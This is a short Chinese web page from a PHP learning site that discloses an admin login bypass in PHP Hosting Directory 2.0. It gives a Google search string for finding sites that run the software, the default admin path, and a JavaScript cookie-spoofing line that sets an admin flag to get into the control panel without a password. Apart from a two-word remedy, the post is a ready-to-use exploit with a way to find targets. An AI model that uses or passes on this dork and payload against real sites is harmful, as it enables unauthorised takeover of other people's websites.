来源:自学PHP网 时间:2015-04-17 15:08 作者: 阅读:次
[导读] PHP Hosting Directory 2.0 程序后台验证不严格,导致可绕过密码验证登录后台。Google: "powered by PHP Hosting Directory 2.0"默认后台:http://127.0.0.1/admin利用方法:不需要输入任何密码,通过cookie欺骗进...
|
PHP Hosting Directory 2.0 程序后台验证不严格,导致可绕过密码验证登录后台。 Google: "powered by PHP Hosting Directory 2.0" 默认后台:http://127.0.0.1/admin 利用方法: 不需要输入任何密码,通过cookie欺骗进入后台。 javascript:document.cookie = "adm=1; path=/"; 重新刷新即可登录后台控制面板。
修复方案: 加强过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
